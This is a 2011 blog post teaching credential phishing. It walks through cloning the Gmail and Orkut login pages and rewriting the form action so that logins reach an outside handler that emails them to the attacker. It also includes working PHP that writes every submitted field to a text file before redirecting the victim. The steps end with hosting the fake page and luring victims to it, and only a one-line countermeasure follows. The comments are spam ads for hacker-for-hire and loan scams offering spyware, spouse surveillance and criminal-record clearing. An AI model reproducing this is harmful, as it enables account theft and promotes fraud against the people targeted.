Thursday, July 21, 2011

Phishing(Basic Level)

What is Phishing?

Phishing is a technique to obtain password,username or any sensetive information like Credit card details using a fake page which pretends to be a real one.


How to perform the attack?

Method-1:Directing the username and password to your email Id

1.First You need to create a fake login page.So, how to do it?
Example:-open gmail.com in your browser. In the login page Click Right mouse button and save the page.

2.You must know basic HTML to understand this step: there is a keyword "ACTION" in the HTML code, its task is to send the details of the page to a handler(script), now what we have to do is change the value of that "ACTION" in the form. Lets see how to do it.
Example:-Open the saved login page(gmail.com in our example) with Notepad->press "ctrl+f"(find mode)->type "action" keyword to find.
Now you have located the "action", change the code: inside the two immediate double quotes, replace the code with:
"http://kyrion.in/download/adjgtr.phpid=example@gmail.com&link=gmail.com"
Replace "example@gmail.com" with your email id.
note:-the "link" in the above url is used to direct the page again to gmail.com, you can change it as per your need.

3.Now try login and check if you are getting the email or not. If everything is working good, now its time to upload these login pages. To do so choose any free webhosting sites(eg:my3gb.com): create an account, go to file manager and upload all files and folder which you have saved.

4.Now give the link(say:username.my3gb.com/gmail.html) of your fake login page to the victim through email or any other way. Now its upto you how to make your victim login through your fake page(use your head).





Method-2:Storing the username and password in txt file(uploaded in website)

1.First You need to create a fake login page.So, how to do it?
Example:-open orkut.com in your browser. In the login page Click Right mouse button and save the page.

2.Now create notify.php file.(copy and paste the below code and save it with name notify.php)



notify.php
<?php
header ('Location:http://www.orkut.com ');
$file = fopen("store.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($file, $variable);
fwrite($file, "=");
fwrite($file, $value);
fwrite($file, "\r\n");
}
fwrite($file, "\r\n");
fclose($file);
exit;
?>



3.Now create an empty store.txt file.

4.Open the login page saved earlier with notepad and find "action" word(hint:press "ctrl+f"). Change the value(inside two immediate double quotes) of action to "notify.php"
i.e. after submitting the login form will be handled by notify.php which will further redirect the page to orkut.com, check the header section of the php code, you can change it as per your need.









5.Upload all files(fake login page with folder,notify.php and store.txt) to my3gb.com(or any free hosting site).

 6. Serve your fake login page link to the victim. Once the victim login through your page, the login details will be stored in "store.txt" so don't forget to check the store.txt file.


Countermeasuers:

The only possible countermeasure is just don't enter the confidential data without checking the URL of the website. There are some other phishing attacks in which URL can be spoofed so better check the certificate of the website.

8 comments:

  1. When you need a great hacker that's reliable and trustworthy and cost effective,in WORLDHACKERS79@GMAIL.COM you got the best hacker in town to hack into any devices of your choice.
    this is the only hacker that's reliable,tested and trusted,they'll deliver your work in 6hours and hack into any devices of your spouse without installing anything on the target's phone and with no physical contact on your spouse's phone.
    thanks for the good work from
    Worldhackers79@gmail.com

    ReplyDelete
    Replies
    1. ⚡️✅MEET THE REAL HACKERS✅⚡️

      It Tears me Up Whenever we receive complaints from Clients About Their Experience With the Hackers They Met Before They Heard about us.
      These Days There Are alot of Hackers Online, You Just Have to Be Careful about who you meet for help, because many people now don't know who to ask for help anymore but there's really an actual solution to that which I am giving you for free, Don't go for the incompetent ones which I know you understand what I'm saying like hackers using gmail, yahoomail and other cheaper email accounts that could be easily hacked ⚠️🚷, come to think of it, why the fuck would a REAL HACKER want to use a Mailing Service that brings out his vulnerabilities? ❌❌ ❌ so can you see they are really not who they say they're, they are just here to Rip people Off, You Can Always Identify Them With Their False Write Ups and False Testimonies Trying To Lure you Into their Arms.❌❌❌ and my advice really goes out to you looking for a Real Hacker that's a heads up so that you wouldn’t fall deep into their trap no more.🚷⚠️⚠️⚠️

      ✅COMPOSITE HACKS is here to Provide you with The Best Hackers, So you can get saved from The Arms of the Fake Hackers❌❌

      ✅We have Legit Hackers and Private investigators at your service. 💻 Every member of our team is well experienced in their various niches with Great Skills, Technical Hacking Strategies And Positive Online Reviews And Recommendations💻🛠

      ✅We have Digital Forensic Specialists, Certified Ethical Hackers, Computer Engineers, Cyber Security Experts, Private investigators and more on our team. Our Goal is to make your digital life secure, safe and hassle-free.
      Some Of The Services we render includes:
      * Website hacking 💻
      * Facebook and social media hacking 📲
      * Database hacking, & Blog Cleaning🛠
      * Phone and Gadget Hacking 📲
      • CREDIT CARD MISHAPS 💳 💥
      * Clearing Of Criminal Records ❌
      * RECOVERY OF LOST FUNDS ON BINARY OPTIONS & CAPITAL INVESTMENTS💰
      * Location Tracking 📲
      and many More

      ✅We have a team of seasoned PROFESSIONALS under various skillsets when it comes to online hacking services. Our company in fact houses a separate group of specialists who are productively focussed and established authorities in different platforms. They hail from a proven track record Called “HackerOne” and have cracked even the toughest of barriers to intrude and capture or recapture all relevant data needed by our Clients. Some Of These Specialist Includes ⭐️ PETER YAWORSKI ⭐️FRANS ROSEN⭐️ JACK CABLE ⭐️JOBERT ABMA⭐️ ARNE SWINNEN ⭐️And More. All you Need To do is To Write us a Mail Then We’ll Assigned any of These Hackers To You Instantly.

      Feel Free To Mail Us Anytime

      ✅CONTACT:
      * Email:
      compositehacks@protonmail.com
      * Wickr: compositehacks


      ★CONTACT US AND GET YOUR PROBLEMS SOLVED IN THE TWINKLING OF AN EYE

      Delete
  2. On behalf of my family we want to say a big thank you to Kenny Blackhat, i have been thinking on how to show my appreciation for the assistance you did offered for the credit score job... We've got 440 and was seeking credit repair on how to increase the points up to 700+ in order to live a comfy way. I saw some russian students he worked for recommendation on this forum and i contacted kenny for the hacking job, he did explain and advice on how he was gonna alter these various points. Took exactly 5 days to clearly reveal the points, and to our greatest surprise it was actually 750!...I just wanna say a big THANK YOU to you and your team Kenny Group blackhat, in case you're wondering who Kenny blackhat is, he's the real deal on any hacking job you want and related forums. I say well done kenny. kennyblackhat@hackermail. com is the mail and they do have a cell number for other communications at +1 717-388-3985 and i am Mrs Lynn Sisto. thank you again kenny Group Blackhat and may God bless deeply.

    ReplyDelete
  3. CLASSIC CYBER HACKS
    How well are you prepared for a Cyber incident or Breach?, Is your Data safe?

    Strengthen your Cybersecurity stance by contacting CLASSIC CYBER HACKS for a Perfect, Unique, Classic and Professional Job in Securing your Network against all sort of Breache, for we are Specially equipped with the solution you need to have All your Cyber Hack needs met

    We specialize in All type of cyber Jobs such as:

    #TRACKING of GPS location, cars, Computers, Phones (Apple, windows and Android), e.t.c.
    We also track E-mail account, Social media such as Facebook, Twitter, Skype, Whatsapp, e.t.c.

    #RECOVERY of Passwords for E-mail address, Phones, Computers, Social media Accounts, Documents e.t.c,.
    NOTE: we also help Scammed persons recover their money.

    #INSTALLATION of Spy ware so as to spy into someone else's computer, phone or E-mail address and also Installation of Spy ware software on your individual O.S to know if your Gadget is being hacked into..
    We also Create and Install VIRUS into any desired computer gadget.

    #CRACKING into Websites and Data base of both Private and Govt organization, such as Schools, Hospitals, Court houses, The FBI, NSA e.t.c

    NOTE: We specialize in clearing of CRIMINAL RECORDS of diverse types.

    * We assure you that your Job will be attended to with care and efficiency as it will be done in no delayed time.

    #We also have a forum where you can get yourself equipped with Advanced hacking Knowledge and Also if you're Good with Hacking and you think you can Join our Team of sophisticated hackers, you're welcome as well...
    At CLASSIC CYBER HACKS, we give you the Best service in the Hacking world.
    *We're Classic hackers*
    Write us on:

    *Classiccyberhacks@gmail.com
    *Classiccybernotch@gmail.com

    Signed,
    Collins .A.

    ReplyDelete
  4. "Fake hackers asks for payment before services that they do not still render at the end but I want to introduce you to a university graduate of havard in computer science as well as computer geek for any sort of account,grade,email, credit card, erasing criminal records etc,you name it. She shows proof of work and payment is made only after service well done to your satisfaction Contact her at Jamiehacking99@gmail.com"

    ReplyDelete
  5. Hello Everybody,
    My name is Mrs Sharon Sim. I live in Singapore and i am a happy woman today? and i told my self that any lender that rescue my family from our poor situation, i will refer any person that is looking for loan to him, he gave me happiness to me and my family, i was in need of a loan of $250,000.00 to start my life all over as i am a single mother with 3 kids I met this honest and GOD fearing man loan lender that help me with a loan of $250,000.00 SG. Dollar, he is a GOD fearing man, if you are in need of loan and you will pay back the loan please contact him tell him that is Mrs Sharon, that refer you to him. contact Dr Purva Pius, call/whats-App Contact Number +918929509036 via email:(urgentloan22@gmail.com) Thank you.

    BORROWERS APPLICATION DETAILS


    1. Name Of Applicant in Full:……..
    2. Telephone Numbers:……….
    3. Address and Location:…….
    4. Amount in request………..
    5. Repayment Period:………..
    6. Purpose Of Loan………….
    7. country…………………
    8. phone…………………..
    9. occupation………………
    10.age/sex…………………
    11.Monthly Income…………..
    12.Email……………..

    Regards.
    Managements
    Email Kindly Contact: (urgentloan22@gmail.com)

    ReplyDelete
  6. CLASSIC CYBER NOTCH
    How well are you prepared for a Cyber incident or Breach?, Is your Data safe?
    Strengthen your Cybersecurity stance by contacting CLASSIC CYBER NOTCH @ GMAIL DOT COM for a Perfect, Unique, Classic and Professional Job in Securing your Network against all sort of breaches and from scammers as well.
    For we are Specially equipped with the Best hands to getting your Cyber Hack needs met as your jobs will be handled with utmost professionalism.

    We do All type of cyber Jobs such as:
    ☑ TRACKING of GPS location, cars, Computers, Phones (Apple, windows and Android), e.t.c.
    We also Track
    E-MAIL account,(G-mail, Yahoo mail, AOL, Proton mail, etc.)
    SOCIAL MEDIA account, (Facebook, Twitter, Skype, Whatsapp, e.t.c.)

    ☑ RECOVERY of Passwords for E-mail address, Phones, Computers, Social media Accounts, Documents e.t.c

    ☑ INSTALLATION of Spy ware so as to spy into someone else's computer, phone or E-mail address and also Installation of Spy ware software on your individual O.S to know if your Gadget is being hacked into..
    We also Create and Install VIRUS into any desired computer gadget.

    ☑ CRACKING Websites, any desired gadget it computers or phones, CCTV Survelance camera, Data base (of both Private and Govt organization, such as Schools, Hospitals, Court houses, The FBI, NSA) e.t.c....

    NOTE:
    Other Jobs we do are:
    ☑ We provide Private Investigator service
    ☑ Clearing Criminal records of diverse type
    ☑ Binary Options fraud Recovery
    ☑ Bitcoin Mining
    ☑ Issuing of Blank ATM cards
    ☑ And many more... etc.

    We assure you that your Job will be attended to with care and efficiency as it will be handled by the Best professional hands in Cyber literacy.
    We also have a forum where you can get yourself equipped with Advanced hacking Knowledge..

    CLASSIC CYBER NOTCH gives you the Best service in the Hacking world.

    Be sure to 📱 💻 us @

    Classic cyber notch at gmail dot com

    any time, any day to get the Best Professional hands involved in putting a smile on your face.
    We're Classic Notch

    Signed,
    Collins .A.

    ReplyDelete